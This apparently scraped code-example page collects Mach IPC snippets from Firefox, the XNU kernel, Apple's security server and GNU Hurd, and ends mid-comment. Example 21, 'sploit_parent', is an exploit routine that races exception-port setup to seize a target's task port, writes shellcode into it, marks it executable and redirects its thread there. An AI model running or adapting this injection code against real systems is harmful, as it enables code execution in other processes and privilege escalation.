    // signal handler, the crash reporter or something else entirely.
    if (previous.port != MACH_PORT_NULL) {
        mach_msg_type_number_t stateCount;
        thread_state_data_t state;
        if ((uint32_t(previous.behavior) & ~MACH_EXCEPTION_CODES) != EXCEPTION_DEFAULT) {
            // If the previous handler requested thread state, get it here.
            stateCount = THREAD_STATE_MAX;
            ret = thread_get_state(request.thread.name, previous.flavor, state, &stateCount);
            if (ret != KERN_SUCCESS)
                MOZ_CRASH("MachExceptionHandler: Could not get the thread state to forward!");
        }

        // Depending on the behavior of the previous handler, the forwarded
        // exception message will have a different set of fields.
        // Of particular note is that exception handlers that lack
        // MACH_EXCEPTION_CODES will get 32-bit fields even on 64-bit
        // systems. It appears that OSX simply truncates these fields.
        ExceptionRequestUnion forward;
        switch (uint32_t(previous.behavior)) {
          case EXCEPTION_DEFAULT:
             CopyExceptionRequest32(request, forward.r32);
             break;
          case EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES:
             CopyExceptionRequest64(request, forward.r64);
             break;
          case EXCEPTION_STATE:
             CopyExceptionRequestState32(request, forward.rs32,
                                         previous.flavor, stateCount, state);
             break;
          case EXCEPTION_STATE | MACH_EXCEPTION_CODES:
             CopyExceptionRequestState64(request, forward.rs64,
                                         previous.flavor, stateCount, state);
             break;
          case EXCEPTION_STATE_IDENTITY:
             CopyExceptionRequestStateIdentity32(request, forward.rsi32,
                                                 previous.flavor, stateCount, state);
             break;
          case EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES:
             CopyExceptionRequestStateIdentity64(request, forward.rsi64,
                                                 previous.flavor, stateCount, state);
             break;
          default:
             MOZ_CRASH("MachExceptionHandler: Unknown previous handler behavior!");
        }

        // Forward the generated message to the old port. The local and remote
        // port fields *and their rights* are swapped on arrival, so we need to
        // swap them back first.
        forward.header.msgh_bits = (request.header.msgh_bits & ~MACH_MSGH_BITS_PORTS_MASK) |
            MACH_MSGH_BITS(MACH_MSGH_BITS_LOCAL(request.header.msgh_bits),
                           MACH_MSGH_BITS_REMOTE(request.header.msgh_bits));
        forward.header.msgh_local_port = forward.header.msgh_remote_port;
        forward.header.msgh_remote_port = previous.port;
        ret = mach_msg(&forward.header, MACH_SEND_MSG, forward.header.msgh_size, 0,
                       MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
        if (ret != MACH_MSG_SUCCESS)
            MOZ_CRASH("MachExceptionHandler: Failed to forward to the previous handler!");
    } else {
        // There was no previous task-level exception handler, so defer to the
        // host level one instead. We set the return code to KERN_FAILURE to
        // indicate that we did not handle the exception.
        // The reply message ID is always the request ID + 100.
        ExceptionReply reply = {};
        reply.header.msgh_bits =
            MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(request.header.msgh_bits), 0);
        reply.header.msgh_size = static_cast<mach_msg_size_t>(sizeof(reply));
        reply.header.msgh_remote_port = request.header.msgh_remote_port;
        reply.header.msgh_local_port = MACH_PORT_NULL;
        reply.header.msgh_id = request.header.msgh_id + 100;
        reply.NDR = request.NDR;
        reply.RetCode = KERN_FAILURE;
        ret = mach_msg(&reply.header, MACH_SEND_MSG, reply.header.msgh_size, 0,
                       MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
        if (ret != MACH_MSG_SUCCESS)
            MOZ_CRASH("MachExceptionHandler: Failed to forward to the host level!");
    }
}
Esempio n. 19
0
mach_msg_return_t
mach_msg_server(
	boolean_t		(*demux)(mach_msg_header_t *,
					 mach_msg_header_t *),
	mach_msg_size_t		max_size,
	mach_port_t		rcv_name,
	mach_msg_options_t	server_options)
{
	mig_reply_error_t 	*bufRequest, *bufReply, *bufTemp;
	mach_msg_return_t 	mr;
	mach_msg_options_t	options;
	static char here[] =	"mach_msg_server";

	bufRequest = (mig_reply_error_t *)kalloc(max_size + MAX_TRAILER_SIZE);
	if (bufRequest == 0)
		return KERN_RESOURCE_SHORTAGE;
	bufReply = (mig_reply_error_t *)kalloc(max_size + MAX_TRAILER_SIZE);
	if (bufReply == 0)
		return KERN_RESOURCE_SHORTAGE;

	for (;;) {
	    get_request:
		mr = mach_msg(&bufRequest->Head, MACH_RCV_MSG | server_options,
			      0, max_size, rcv_name, MACH_MSG_TIMEOUT_NONE,
			      MACH_PORT_NULL);
		while (mr == MACH_MSG_SUCCESS) {
			/* we have a request message */

			(void) (*demux)(&bufRequest->Head, &bufReply->Head);

			if (!(bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)
			    && bufReply->RetCode != KERN_SUCCESS) {
				if (bufReply->RetCode == MIG_NO_REPLY)
					goto get_request;

				/*
				 * Don't destroy the reply port right,
				 * so we can send an error message
				 */
				bufRequest->Head.msgh_remote_port =
					MACH_PORT_NULL;
				mach_msg_destroy(&bufRequest->Head);
			}

			if (bufReply->Head.msgh_remote_port == MACH_PORT_NULL) {
				/* no reply port, so destroy the reply */
				if (bufReply->Head.msgh_bits &
				    MACH_MSGH_BITS_COMPLEX)
					mach_msg_destroy(&bufReply->Head);

				goto get_request;
			}

			/* send reply and get next request */

			bufTemp = bufRequest;
			bufRequest = bufReply;
			bufReply = bufTemp;

			/*
			 * We don't want to block indefinitely because the
			 * client isn't receiving messages from the reply port.
			 * If we have a send-once right for the reply port,
			 * then this isn't a concern because the send won't
			 * block.
			 * If we have a send right, we need to use
			 * MACH_SEND_TIMEOUT.
			 * To avoid falling off the kernel's fast RPC path
			 * unnecessarily, we only supply MACH_SEND_TIMEOUT when
			 * absolutely necessary.
			 */

			options = MACH_SEND_MSG | MACH_RCV_MSG | server_options;
			if (MACH_MSGH_BITS_REMOTE(bufRequest->Head.msgh_bits)
			    != MACH_MSG_TYPE_MOVE_SEND_ONCE) {
				options |= MACH_SEND_TIMEOUT;
			}
			mr = mach_msg(&bufRequest->Head, options,
				      bufRequest->Head.msgh_size, max_size,
				      rcv_name, MACH_MSG_TIMEOUT_NONE,
				      MACH_PORT_NULL);
		}

		/* a message error occurred */

		switch (mr) {
		    case MACH_SEND_INVALID_DEST:
		    case MACH_SEND_TIMED_OUT:
			/* the reply can't be delivered, so destroy it */
			mach_msg_destroy(&bufRequest->Head);
			break;

		    case MACH_RCV_TOO_LARGE:
			/* the kernel destroyed the request */
			break;

		    default:
			dprintf(("mach_msg_overwrite_trap returned 0x%x %s\n",
				 mr, mach_error_string(mr)));
			Panic("mach_msg failed");
			/* should only happen if the server is buggy */
			kfree((char *) bufRequest, max_size + MAX_TRAILER_SIZE);
			kfree((char *) bufReply, max_size + MAX_TRAILER_SIZE);
			return mr;
		}
	}
}
Esempio n. 20
0
void MachServer::runServerThread(bool doTimeout)
{
	// allocate request/reply buffers
    Message bufRequest(mMaxSize);
    Message bufReply(mMaxSize);
	
	// all exits from runServerThread are through exceptions
	try {
		// register as a worker thread
		perThread().server = this;

		for (;;) {
			// progress hook
			eventDone();
			
			// process all pending timers
			while (processTimer()) {}
		
			// check for worker idle timeout
			{	StLock<Mutex> _(managerLock);
				// record idle thread low-water mark in scan interval
				if (idleCount < leastIdleWorkers)
					leastIdleWorkers = idleCount;
				
				// perform self-timeout processing
				if (doTimeout) {
					if (workerCount > maxWorkerCount)	// someone reduced maxWorkerCount recently...
						break;							// ... so release this thread immediately
					Time::Absolute rightNow = Time::now();
					if (rightNow >= nextCheckTime) {	// reaping period complete; process
						UInt32 idlers = leastIdleWorkers;
                        secinfo("machserver", "reaping workers: %d %d", (uint32_t) workerCount, (uint32_t) idlers);
						nextCheckTime = rightNow + workerTimeout;
						leastIdleWorkers = INT_MAX;
						if (idlers > 1)					// multiple idle threads throughout measuring interval...
							break;						// ... so release this thread now
					}
				}
			}
			
			// determine next timeout (if any)
            bool indefinite = false;
			Time::Interval timeout = workerTimeout;
			{	StLock<Mutex> _(managerLock);
				if (timers.empty()) {
					indefinite = !doTimeout;
				} else {
					timeout = max(Time::Interval(0), timers.next() - Time::now());
					if (doTimeout && workerTimeout < timeout)
						timeout = workerTimeout;
                }
			}

			// receive next IPC request (or wait for timeout)
			mach_msg_return_t mr = indefinite ?
				mach_msg_overwrite(bufRequest,
					MACH_RCV_MSG | mMsgOptions,
					0, mMaxSize, mPortSet,
					MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL,
					(mach_msg_header_t *) 0, 0)
                    :
				mach_msg_overwrite(bufRequest,
					MACH_RCV_MSG | MACH_RCV_TIMEOUT | MACH_RCV_INTERRUPT | mMsgOptions,
					0, mMaxSize, mPortSet,
					mach_msg_timeout_t(timeout.mSeconds()), MACH_PORT_NULL,
					(mach_msg_header_t *) 0, 0);
					
			switch (mr) {
			case MACH_MSG_SUCCESS:
				// process received request message below
				break;
			default:
                secinfo("machserver", "received error: %d", mr);
				continue;
			}
			
			// process received message
			if (bufRequest.msgId() >= MACH_NOTIFY_FIRST &&
				bufRequest.msgId() <= MACH_NOTIFY_LAST) {
				// mach kernel notification message
				// we assume this is quick, so no thread arbitration here
				cdsa_notify_server(bufRequest, bufReply);
			} else {
				// normal request message
				StLock<MachServer, &MachServer::busy, &MachServer::idle> _(*this);
                secinfo("machserver", "begin request: %d, %d", bufRequest.localPort().port(), bufRequest.msgId());
				
				// try subsidiary handlers first
				bool handled = false;
				for (HandlerSet::const_iterator it = mHandlers.begin();
						it != mHandlers.end(); it++)
					if (bufRequest.localPort() == (*it)->port()) {
						(*it)->handle(bufRequest, bufReply);
						handled = true;
					}
				if (!handled) {
					// unclaimed, send to main handler
                    handle(bufRequest, bufReply);
                }

                secinfo("machserver", "end request");
			}

			// process reply generated by handler
            if (!(bufReply.bits() & MACH_MSGH_BITS_COMPLEX) &&
                bufReply.returnCode() != KERN_SUCCESS) {
                    if (bufReply.returnCode() == MIG_NO_REPLY)
						continue;
                    // don't destroy the reply port right, so we can send an error message
                    bufRequest.remotePort(MACH_PORT_NULL);
                    mach_msg_destroy(bufRequest);
            }

            if (bufReply.remotePort() == MACH_PORT_NULL) {
                // no reply port, so destroy the reply
                if (bufReply.bits() & MACH_MSGH_BITS_COMPLEX)
                    bufReply.destroy();
                continue;
            }

            /*
             *  We don't want to block indefinitely because the client
             *  isn't receiving messages from the reply port.
             *  If we have a send-once right for the reply port, then
             *  this isn't a concern because the send won't block.
             *  If we have a send right, we need to use MACH_SEND_TIMEOUT.
             *  To avoid falling off the kernel's fast RPC path unnecessarily,
             *  we only supply MACH_SEND_TIMEOUT when absolutely necessary.
             */
			mr = mach_msg_overwrite(bufReply,
                          (MACH_MSGH_BITS_REMOTE(bufReply.bits()) ==
                                                MACH_MSG_TYPE_MOVE_SEND_ONCE) ?
                          MACH_SEND_MSG | mMsgOptions :
                          MACH_SEND_MSG | MACH_SEND_TIMEOUT | mMsgOptions,
                          bufReply.length(), 0, MACH_PORT_NULL,
                          0, MACH_PORT_NULL, NULL, 0);
			switch (mr) {
			case MACH_MSG_SUCCESS:
				break;
			default:
                secinfo("machserver", "send error: %d %d", mr, bufReply.remotePort().port());
				bufReply.destroy();
				break;
			}

            
            // clean up after the transaction
            releaseDeferredAllocations();
        }
		perThread().server = NULL;
		
	} catch (...) {
		perThread().server = NULL;
		throw;
	}
}
Esempio n. 21
0
// return 0 to try again
int sploit_parent(mach_port_t child_task_port, mach_port_t exception_port) {
    kern_return_t err;
    kern_return_t set_exception_ports_err = KERN_SUCCESS;

    while (set_exception_ports_err == KERN_SUCCESS) {
        set_exception_ports_err = task_set_exception_ports(
                                      child_task_port,
                                      EXC_MASK_ALL,
                                      exception_port,
                                      EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES,  // we want to receive a catch_exception_raise message
                                      THREAD_STATE_NONE);
    }

    // setting the exception port has now started failing
    // try to receive a message; use a timeout because we may have lost the race and need to try again:

    size_t size = 0x1000;
    struct exception_raise_msg* request = malloc(size);
    memset(request, 0, size);

    err = mach_msg(&request->Head,
                   MACH_RCV_MSG | MACH_RCV_TIMEOUT,
                   0,
                   size,
                   exception_port,
                   10, // 10ms timeout
                   0);

    if (err != KERN_SUCCESS) {
        printf("[-] failed to receive message on exception port - trying again (%s)\n", mach_error_string(err));
        return 0;
    }

    // we got it!
    printf("[+] got exception message with target's task and thread ports\n");
    mach_port_t target_task = request->task.name;
    mach_port_t target_thread = request->thread.name;

    // allocate some memory in the task
    mach_vm_address_t shellcode_addr = 0;
    err = mach_vm_allocate(target_task,
                           &shellcode_addr,
                           0x1000,
                           VM_FLAGS_ANYWHERE);

    if (err != KERN_SUCCESS) {
        printf("[-] mach_vm_allocate: %s\n", mach_error_string(err));
        return 1;
    }
    printf("[+] allocated shellcode in target at %llx\n", shellcode_addr);

    // write the shellcode there:
    err = mach_vm_write(target_task,
                        shellcode_addr,
                        (vm_offset_t)sc,
                        sizeof(sc));

    if (err != KERN_SUCCESS) {
        printf("[-] mach_vm_write: %s\n", mach_error_string(err));
        return 1;
    }

    // make it executable
    err = mach_vm_protect(target_task,
                          shellcode_addr,
                          0x1000,
                          0,
                          VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE); // also writeable because we put the stack there

    if (err != KERN_SUCCESS) {
        printf("[-] mach_vm_protect: %s\n", mach_error_string(err));
        return 1;
    }

    // set the thread state to point to the the shellcode
    x86_thread_state64_t state;
    mach_msg_type_number_t stateCount = x86_THREAD_STATE64_COUNT;

    memset(&state, 0, sizeof(state));

    state.__rip = (uint64_t)shellcode_addr;
    state.__rsp = (uint64_t)shellcode_addr + 0x800; // the shellcode uses the stack

    err = thread_set_state(target_thread,
                           x86_THREAD_STATE64,
                           (thread_state_t)&state,
                           stateCount);

    if (err != KERN_SUCCESS) {
        printf("[-] thread_set_state: %s\n", mach_error_string(err));
        return 1;
    }

    // reply to the exception message
    struct exception_reply_msg reply = {0};
    reply.Head.msgh_remote_port = request->Head.msgh_remote_port;
    reply.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(request->Head.msgh_bits), 0);
    reply.Head.msgh_id = request->Head.msgh_id + 100;
    reply.Head.msgh_size = sizeof(reply);
    reply.NDR = NDR_record;
    reply.RetCode = MACH_MSG_SUCCESS;

    err = mach_msg(&reply.Head,
                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                   (mach_msg_size_t)sizeof(reply),
                   0,
                   MACH_PORT_NULL,
                   MACH_MSG_TIMEOUT_NONE,
                   MACH_PORT_NULL);

    if (err != KERN_SUCCESS) {
        printf("[-] mach_msg sending reply to exception message: %s\n", mach_error_string(err));
        return 1;
    }

    return 1;
}
Esempio n. 22
0
/*
 *	Routine:	ipc_mqueue_send
 *	Purpose:
 *		Send a message to a message queue.  The message holds a reference
 *		for the destination port for this message queue in the 
 *		msgh_remote_port field.
 *
 *		If unsuccessful, the caller still has possession of
 *		the message and must do something with it.  If successful,
 *		the message is queued, given to a receiver, or destroyed.
 *	Conditions:
 *		mqueue is locked.
 *	Returns:
 *		MACH_MSG_SUCCESS	The message was accepted.
 *		MACH_SEND_TIMED_OUT	Caller still has message.
 *		MACH_SEND_INTERRUPTED	Caller still has message.
 */
mach_msg_return_t
ipc_mqueue_send(
	ipc_mqueue_t		mqueue,
	ipc_kmsg_t		kmsg,
	mach_msg_option_t	option,
	mach_msg_timeout_t	send_timeout,
	spl_t			s)
{
	int wresult;

	/*
	 *  Don't block if:
	 *	1) We're under the queue limit.
	 *	2) Caller used the MACH_SEND_ALWAYS internal option.
	 *	3) Message is sent to a send-once right.
	 */
	if (!imq_full(mqueue) ||
	    (!imq_full_kernel(mqueue) && 
	     ((option & MACH_SEND_ALWAYS) ||
	      (MACH_MSGH_BITS_REMOTE(kmsg->ikm_header->msgh_bits) ==
	       MACH_MSG_TYPE_PORT_SEND_ONCE)))) {
		mqueue->imq_msgcount++;
		assert(mqueue->imq_msgcount > 0);
		imq_unlock(mqueue);
		splx(s);
	} else {
		thread_t cur_thread = current_thread();
		uint64_t deadline;

		/* 
		 * We have to wait for space to be granted to us.
		 */
		if ((option & MACH_SEND_TIMEOUT) && (send_timeout == 0)) {
			imq_unlock(mqueue);
			splx(s);
			return MACH_SEND_TIMED_OUT;
		}
		if (imq_full_kernel(mqueue)) {
			imq_unlock(mqueue);
			splx(s);
			return MACH_SEND_NO_BUFFER;
		}
		mqueue->imq_fullwaiters = TRUE;
		thread_lock(cur_thread);
		if (option & MACH_SEND_TIMEOUT)
			clock_interval_to_deadline(send_timeout, 1000*NSEC_PER_USEC, &deadline);
		else
			deadline = 0;
		wresult = wait_queue_assert_wait64_locked(
						&mqueue->imq_wait_queue,
						IPC_MQUEUE_FULL,
						THREAD_ABORTSAFE,
						TIMEOUT_URGENCY_USER_NORMAL,
						deadline, 0,
						cur_thread);
		thread_unlock(cur_thread);
		imq_unlock(mqueue);
		splx(s);
		
		if (wresult == THREAD_WAITING) {
			wresult = thread_block(THREAD_CONTINUE_NULL);
			counter(c_ipc_mqueue_send_block++);
		}
		
		switch (wresult) {
		case THREAD_TIMED_OUT:
			assert(option & MACH_SEND_TIMEOUT);
			return MACH_SEND_TIMED_OUT;
			
		case THREAD_AWAKENED:
			/* we can proceed - inherited msgcount from waker */
			assert(mqueue->imq_msgcount > 0);
			break;
			
		case THREAD_INTERRUPTED:
			return MACH_SEND_INTERRUPTED;
			
		case THREAD_RESTART:
			/* mqueue is being destroyed */
			return MACH_SEND_INVALID_DEST;
		default:
			panic("ipc_mqueue_send");
		}
	}

	ipc_mqueue_post(mqueue, kmsg);
	return MACH_MSG_SUCCESS;
}
void
ports_manage_port_operations_one_thread (struct port_bucket *bucket,
					 ports_demuxer_type demuxer,
					 int timeout)
{
  error_t err;

  int 
  internal_demuxer (mach_msg_header_t *inp,
		    mach_msg_header_t *outheadp)
    {
      struct port_info *pi;
      struct rpc_info link;
      int status;
      error_t err;
      register mig_reply_header_t *outp = (mig_reply_header_t *) outheadp;
      static const mach_msg_type_t RetCodeType = {
		/* msgt_name = */		MACH_MSG_TYPE_INTEGER_32,
		/* msgt_size = */		32,
		/* msgt_number = */		1,
		/* msgt_inline = */		TRUE,
		/* msgt_longform = */		FALSE,
		/* msgt_deallocate = */		FALSE,
		/* msgt_unused = */		0
	};

      /* Fill in default response. */
      outp->Head.msgh_bits 
	= MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(inp->msgh_bits), 0);
      outp->Head.msgh_size = sizeof *outp;
      outp->Head.msgh_remote_port = inp->msgh_remote_port;
      outp->Head.msgh_local_port = MACH_PORT_NULL;
      outp->Head.msgh_seqno = 0;
      outp->Head.msgh_id = inp->msgh_id + 100;
      outp->RetCodeType = RetCodeType;
      outp->RetCode = MIG_BAD_ID;

      pi = ports_lookup_port (bucket, inp->msgh_local_port, 0);
      if (pi)
	{
	  err = ports_begin_rpc (pi, inp->msgh_id, &link);
	  if (err)
	    {
	      mach_port_deallocate (mach_task_self (), inp->msgh_remote_port);
	      outp->RetCode = err;
	      status = 1;
	    }
	  else
	    {
	      /* No need to check cancel threshhold here, because
		 in a single threaded server the cancel is always
		 handled in order. */
	      status = demuxer (inp, outheadp);
	      ports_end_rpc (pi, &link);
	    }
	  ports_port_deref (pi);
	}
      else
	{
	  outp->RetCode = EOPNOTSUPP;
	  status = 1;
	}

      return status;
    }
  
  do
    err = mach_msg_server_timeout (internal_demuxer, 0, bucket->portset, 
				   timeout ? MACH_RCV_TIMEOUT : 0, timeout);
  while (err != MACH_RCV_TIMED_OUT);
}
Esempio n. 24
0
ipc_kmsg_t
ipc_kobject_server(
	ipc_kmsg_t	request,
	mach_msg_option_t __unused option)
{
	mach_msg_size_t reply_size;
	ipc_kmsg_t reply;
	kern_return_t kr;
	ipc_port_t *destp;
	ipc_port_t  replyp = IPC_PORT_NULL;
	mach_msg_format_0_trailer_t *trailer;
	mig_hash_t *ptr;
	task_t task = TASK_NULL;
	uint32_t exec_token;
	boolean_t exec_token_changed = FALSE;

	/*
	 * Find out corresponding mig_hash entry if any
	 */
	{
	    int key = request->ikm_header->msgh_id;
	    unsigned int i = (unsigned int)MIG_HASH(key);
	    int max_iter = mig_table_max_displ;

	    do {
		ptr = &mig_buckets[i++ % MAX_MIG_ENTRIES];
	    } while (key != ptr->num && ptr->num && --max_iter);

	    if (!ptr->routine || key != ptr->num) {
	        ptr = (mig_hash_t *)0;
		reply_size = mig_reply_size;
	    } else {
		reply_size = ptr->size;
#if	MACH_COUNTER
		ptr->callcount++;
#endif
	    }
	}

	/* round up for trailer size */
        reply_size += MAX_TRAILER_SIZE;
	reply = ipc_kmsg_alloc(reply_size);

	if (reply == IKM_NULL) {
		printf("ipc_kobject_server: dropping request\n");
		ipc_kmsg_trace_send(request, option);
		ipc_kmsg_destroy(request);
		return IKM_NULL;
	}

	/*
	 * Initialize reply message.
	 */
	{
#define	InP	((mach_msg_header_t *) request->ikm_header)
#define	OutP	((mig_reply_error_t *) reply->ikm_header)

	    /* 
	     * MIG should really assure no data leakage -
	     * but until it does, pessimistically zero the
	     * whole reply buffer.
	     */
	    bzero((void *)OutP, reply_size);

	    OutP->NDR = NDR_record;
	    OutP->Head.msgh_size = sizeof(mig_reply_error_t);

	    OutP->Head.msgh_bits =
		MACH_MSGH_BITS_SET(MACH_MSGH_BITS_LOCAL(InP->msgh_bits), 0, 0, 0);
	    OutP->Head.msgh_remote_port = InP->msgh_local_port;
	    OutP->Head.msgh_local_port = MACH_PORT_NULL;
	    OutP->Head.msgh_voucher_port = MACH_PORT_NULL;
	    OutP->Head.msgh_id = InP->msgh_id + 100;

#undef	InP
#undef	OutP
	}

	/*
	 * Find the routine to call, and call it
	 * to perform the kernel function
	 */
	ipc_kmsg_trace_send(request, option);
	{
	    if (ptr) {
		/*
		 * Check if the port is a task port, if its a task port then
		 * snapshot the task exec token before the mig routine call.
		 */
		ipc_port_t port = request->ikm_header->msgh_remote_port;
		if (IP_VALID(port) && ip_kotype(port) == IKOT_TASK) {
			task = convert_port_to_task_with_exec_token(port, &exec_token);
		}

		(*ptr->routine)(request->ikm_header, reply->ikm_header);

		/* Check if the exec token changed during the mig routine */
		if (task != TASK_NULL) {
			if (exec_token != task->exec_token) {
				exec_token_changed = TRUE;
			}
			task_deallocate(task);
		}

		kernel_task->messages_received++;
	    }
	    else {
		if (!ipc_kobject_notify(request->ikm_header, reply->ikm_header)){
#if DEVELOPMENT || DEBUG
		    printf("ipc_kobject_server: bogus kernel message, id=%d\n",
			request->ikm_header->msgh_id);
#endif	/* DEVELOPMENT || DEBUG */
		    _MIG_MSGID_INVALID(request->ikm_header->msgh_id);

		    ((mig_reply_error_t *) reply->ikm_header)->RetCode
			= MIG_BAD_ID;
		}
		else
		  kernel_task->messages_received++;
	    }
	    kernel_task->messages_sent++;
	}

	/*
	 *	Destroy destination. The following code differs from
	 *	ipc_object_destroy in that we release the send-once
	 *	right instead of generating a send-once notification
	 * 	(which would bring us here again, creating a loop).
	 *	It also differs in that we only expect send or
	 *	send-once rights, never receive rights.
	 *
	 *	We set msgh_remote_port to IP_NULL so that the kmsg
	 *	destroy routines don't try to destroy the port twice.
	 */
	destp = (ipc_port_t *) &request->ikm_header->msgh_remote_port;
	switch (MACH_MSGH_BITS_REMOTE(request->ikm_header->msgh_bits)) {
		case MACH_MSG_TYPE_PORT_SEND:
		    ipc_port_release_send(*destp);
		    break;
		
		case MACH_MSG_TYPE_PORT_SEND_ONCE:
		    ipc_port_release_sonce(*destp);
		    break;
		
		default:
		    panic("ipc_kobject_server: strange destination rights");
	}
	*destp = IP_NULL;

	/*
	 *	Destroy voucher.  The kernel MIG servers never take ownership
	 *	of vouchers sent in messages.  Swallow any such rights here.
	 */
	if (IP_VALID(request->ikm_voucher)) {
		assert(MACH_MSG_TYPE_PORT_SEND ==
		       MACH_MSGH_BITS_VOUCHER(request->ikm_header->msgh_bits));
		ipc_port_release_send(request->ikm_voucher);
		request->ikm_voucher = IP_NULL;
	}

        if (!(reply->ikm_header->msgh_bits & MACH_MSGH_BITS_COMPLEX) &&
           ((mig_reply_error_t *) reply->ikm_header)->RetCode != KERN_SUCCESS)
	 	kr = ((mig_reply_error_t *) reply->ikm_header)->RetCode;
	else
		kr = KERN_SUCCESS;

	if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
		/*
		 *	The server function is responsible for the contents
		 *	of the message.  The reply port right is moved
		 *	to the reply message, and we have deallocated
		 *	the destination port right, so we just need
		 *	to free the kmsg.
		 */
		ipc_kmsg_free(request);

	} else {
		/*
		 *	The message contents of the request are intact.
		 *	Destroy everthing except the reply port right,
		 *	which is needed in the reply message.
		 */
		request->ikm_header->msgh_local_port = MACH_PORT_NULL;
		ipc_kmsg_destroy(request);
	}

	replyp = (ipc_port_t)reply->ikm_header->msgh_remote_port;

	if (kr == MIG_NO_REPLY) {
		/*
		 *	The server function will send a reply message
		 *	using the reply port right, which it has saved.
		 */

		ipc_kmsg_free(reply);

		return IKM_NULL;
	} else if (!IP_VALID(replyp)) {
		/*
		 *	Can't queue the reply message if the destination
		 *	(the reply port) isn't valid.
		 */

		ipc_kmsg_destroy(reply);

		return IKM_NULL;
	} else if (replyp->ip_receiver == ipc_space_kernel) {
		/*
		 * Don't send replies to kobject kernel ports
		 */
#if DEVELOPMENT || DEBUG
		printf("%s: refusing to send reply to kobject %d port (id:%d)\n",
		       __func__, ip_kotype(replyp),
		       request->ikm_header->msgh_id);
#endif	/* DEVELOPMENT || DEBUG */
		ipc_kmsg_destroy(reply);
		return IKM_NULL;
	}

	/* Fail the MIG call if the task exec token changed during the call */
	if (kr == KERN_SUCCESS && exec_token_changed) {
		/*
		 *	Create a new reply msg with error and destroy the old reply msg.
		 */
		ipc_kmsg_t new_reply = ipc_kmsg_alloc(reply_size);

		if (new_reply == IKM_NULL) {
			printf("ipc_kobject_server: dropping request\n");
			ipc_kmsg_destroy(reply);
			return IKM_NULL;
		}
		/*
		 *	Initialize the new reply message.
		 */
		{
#define	OutP_new	((mig_reply_error_t *) new_reply->ikm_header)
#define	OutP_old	((mig_reply_error_t *) reply->ikm_header)

		    bzero((void *)OutP_new, reply_size);

		    OutP_new->NDR = OutP_old->NDR;
		    OutP_new->Head.msgh_size = sizeof(mig_reply_error_t);
		    OutP_new->Head.msgh_bits = OutP_old->Head.msgh_bits & ~MACH_MSGH_BITS_COMPLEX;
		    OutP_new->Head.msgh_remote_port = OutP_old->Head.msgh_remote_port;
		    OutP_new->Head.msgh_local_port = MACH_PORT_NULL;
		    OutP_new->Head.msgh_voucher_port = MACH_PORT_NULL;
		    OutP_new->Head.msgh_id = OutP_old->Head.msgh_id;

		    /* Set the error as KERN_INVALID_TASK */
		    OutP_new->RetCode = KERN_INVALID_TASK;

#undef	OutP_new
#undef  OutP_old
		}

		/*
		 *	Destroy everything in reply except the reply port right,
		 *	which is needed in the new reply message.
		 */
		reply->ikm_header->msgh_remote_port = MACH_PORT_NULL;
		ipc_kmsg_destroy(reply);

		reply = new_reply;
	}

 	trailer = (mach_msg_format_0_trailer_t *)
		((vm_offset_t)reply->ikm_header + (int)reply->ikm_header->msgh_size);

 	trailer->msgh_sender = KERNEL_SECURITY_TOKEN;
 	trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
 	trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;

	return reply;
}
Esempio n. 25
0
void
ports_manage_port_operations_one_thread (struct port_bucket *bucket,
					 ports_demuxer_type demuxer,
					 int timeout)
{
  struct ports_thread thread;
  error_t err;

  int 
  internal_demuxer (mach_msg_header_t *inp,
		    mach_msg_header_t *outheadp)
    {
      struct port_info *pi;
      struct rpc_info link;
      int status;
      error_t err;
      register mig_reply_header_t *outp = (mig_reply_header_t *) outheadp;
      static const mach_msg_type_t RetCodeType = {
		/* msgt_name = */		MACH_MSG_TYPE_INTEGER_32,
		/* msgt_size = */		32,
		/* msgt_number = */		1,
		/* msgt_inline = */		TRUE,
		/* msgt_longform = */		FALSE,
		/* msgt_deallocate = */		FALSE,
		/* msgt_unused = */		0
	};

      /* Fill in default response. */
      outp->Head.msgh_bits 
	= MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(inp->msgh_bits), 0);
      outp->Head.msgh_size = sizeof *outp;
      outp->Head.msgh_remote_port = inp->msgh_remote_port;
      outp->Head.msgh_local_port = MACH_PORT_NULL;
      outp->Head.msgh_seqno = 0;
      outp->Head.msgh_id = inp->msgh_id + 100;
      outp->RetCodeType = RetCodeType;
      outp->RetCode = MIG_BAD_ID;

      if (MACH_MSGH_BITS_LOCAL (inp->msgh_bits) ==
	  MACH_MSG_TYPE_PROTECTED_PAYLOAD)
	pi = ports_lookup_payload (bucket, inp->msgh_protected_payload, NULL);
      else
	{
	  pi = ports_lookup_port (bucket, inp->msgh_local_port, 0);
	  if (pi)
	    {
	      /* Store the objects address as the payload and set the
		 message type accordingly.  This prevents us from
		 having to do another hash table lookup in the intran
		 functions if protected payloads are not supported by
		 the kernel.  */
	      inp->msgh_bits =
		MACH_MSGH_BITS_OTHER (inp->msgh_bits)
		| MACH_MSGH_BITS (MACH_MSGH_BITS_REMOTE (inp->msgh_bits),
				  MACH_MSG_TYPE_PROTECTED_PAYLOAD);
	      inp->msgh_protected_payload = (unsigned long) pi;
	    }
	}

      if (pi)
	{
	  err = ports_begin_rpc (pi, inp->msgh_id, &link);
	  if (err)
	    {
	      mach_port_deallocate (mach_task_self (), inp->msgh_remote_port);
	      outp->RetCode = err;
	      status = 1;
	    }
	  else
	    {
	      /* No need to check cancel threshold here, because
		 in a single threaded server the cancel is always
		 handled in order. */
	      status = demuxer (inp, outheadp);
	      ports_end_rpc (pi, &link);
	    }
	  ports_port_deref (pi);
	}
      else
	{
	  outp->RetCode = EOPNOTSUPP;
	  status = 1;
	}

      _ports_thread_quiescent (&bucket->threadpool, &thread);
      return status;
    }

  /* XXX It is currently unsafe for most servers to terminate based on
